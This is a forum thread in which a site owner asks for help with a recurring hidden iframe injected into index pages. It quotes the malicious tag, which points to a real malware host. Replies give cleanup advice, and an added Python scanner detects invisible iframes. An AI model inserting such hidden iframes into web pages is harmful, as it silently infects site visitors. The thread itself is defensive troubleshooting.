Very Frustrated...Websites Compromised

#41baby:
Hello,

I have been having problems with several websites I design/maintain.  We thought the issue was dealt with 3 months ago but it keeps coming back.  The following appears in any page named INDEX:


--- Code: ---
<iframe src="h[i]tt[/i]p://a3h.ru:8080/ts/in.cgi?pepsi82" width=125 height=125 style="visibility: hidden"></iframe>
--- End code ---

It causes a virus to be downloaded.

I have done everything the internet has suggested:  malware scans, virus scans, updating all my programs and I just requested new passwords for each server (I should have it by Monday).  I woke up this morning and the sites were again nailed with the virus.

I read on this list, it could have something to do with PHP code.  Could it be my form code?  I have one PHP and one that is flash with PHP that I got off the net.

If anyone here can help me out, that would be greatly appreciated.

After I get my password change (and I removed the FTP program's storage of the information), what should I do?

Thanks,

DN

MysteryFCM: Embedded HTML in BBCode tags

MysteryFCM:
There's 4 main things you need to do:

1. Check your site's files (ALL of the files) for malicious code
2. Check no shells were uploaded
3. Change the FTP passwords
4. Change any web based passwords for the site

This should ALL be done from a known clean machine (i.e. not the machine you usually use).

If you've got a backup of the site's files, you can skip #1, and just delete ALL of the files currently on the server, and replace them with the backups.

If your site uses a database, this will need to be checked as well.
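Added example, not part of the original thread: one way to carry out step 1 above on a copy of the site downloaded to a clean machine, flagging any file that contains an iframe styled to be invisible, like the one quoted in the first post. The function names, the extension list, the size threshold and the sample page are assumptions made for this sketch, and it does not look for uploaded shells (step 2).

```python
import os
import re
import sys

IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)  # opening tag, may span lines
SRC_ATTR = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
# Ways of hiding a frame from the visitor: CSS as in the quoted snippet, or a 0/1 pixel size.
HIDDEN_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)
TINY_SIZE = re.compile(r"""\b(?:width|height)\s*=\s*["']?[01](?:px)?["'\s>]""", re.IGNORECASE)
WEB_EXTENSIONS = (".html", ".htm", ".shtml", ".php", ".js")

# Constructed sample page; the host is a placeholder, not the one from the thread.
SAMPLE_PAGE = (
    "<html><body>\n<h1>Welcome</h1>\n"
    '<iframe src="http://malicious.example:8080/in.cgi?x" width=125 height=125\n'
    ' style="visibility: hidden"></iframe>\n'
    '<iframe src="/map.html" width=400 height=300></iframe>\n</body></html>\n'
)


def find_hidden_iframes(text):
    """Return (line_number, src) for every iframe tag that is styled to be invisible."""
    hits = []
    for match in IFRAME_TAG.finditer(text):
        tag = match.group(0)
        if HIDDEN_STYLE.search(tag) or TINY_SIZE.search(tag):
            src = SRC_ATTR.search(tag)
            line_number = text.count("\n", 0, match.start()) + 1
            hits.append((line_number, src.group(1) if src else ""))
    return hits


def scan_tree(root):
    """Walk a local copy of the site; return {path: hits} for files with hidden iframes."""
    findings = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(WEB_EXTENSIONS):
                path = os.path.join(folder, name)
                with open(path, encoding="utf-8", errors="replace") as handle:
                    hits = find_hidden_iframes(handle.read())
                if hits:
                    findings[path] = hits
    return findings


if __name__ == "__main__":
    for path, hits in sorted(scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items()):
        print(path, hits)
```

A visible iframe with normal dimensions, such as the second one in the sample, is not reported, so every hit is worth opening and comparing against the known clean copy of that file.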

#41baby:
Hello,

Thanks for the reply.

Questions from your answers:

1. Check your site's files (ALL of the files) for malicious code:  the code keeps appearing and re-appearing.  What I usually do is delete it from the server and upload the one from my computer which does not have it.  Then, after 2 months (or in this case a couple days lately), it reappears.  They only seem to attach the INDEX.HTML pages.

2. Check no shells were uploaded:  I have no idea what you mean by this.  Can you tell me how to check for "shells".

3. Change the FTP passwords:  In the works.

4. Change any web based passwords for the site:  I do have any.

5.  This should ALL be done from a known clean machine (i.e. not the machine you usually use). If you've got a backup of the site's files, you can skip #1, and just delete ALL of the files currently on the server, and replace them with the backups:  This is always the part I get really confused.  The website files from my computer are always clean.  They get infected once I put them online.  I have checked them many times and they are clean.  So, I just have to burn them to a disk, bring them to say, my lap-top (which I never used for uploading to the server before) and upload them?

6. If your site uses a database:  I just have a basic package from www.namesecure.com.  Not sure if it has a database.  I do not think so.

Thanks for your answers and I look forward to clarifying what you already said.

DN

CM_MWR:
These frames were/are being inserted via compromised FTP last I heard, be sure the machine you're using to make changes from isn't compromised as well, I've found that to be the case more than once.

#41baby:
Hello,

These frames were/are being inserted via compromised FTP last I heard, be sure the machine you're using to make changes from isn't compromised as well, I've found that to be the case more than once.

Two (more) Questions:

1 - Any suggestions for checking my computer.  I have done SEVERAL different scans and methods.  Any suggestions would be appreciated.  Perhaps I missed something.

2 - In terms of using another computer to upload:  so I can never use my actual computer again?  What if I need to change something on my website?  My lap-top does not have the programs.

Thanks,

DN
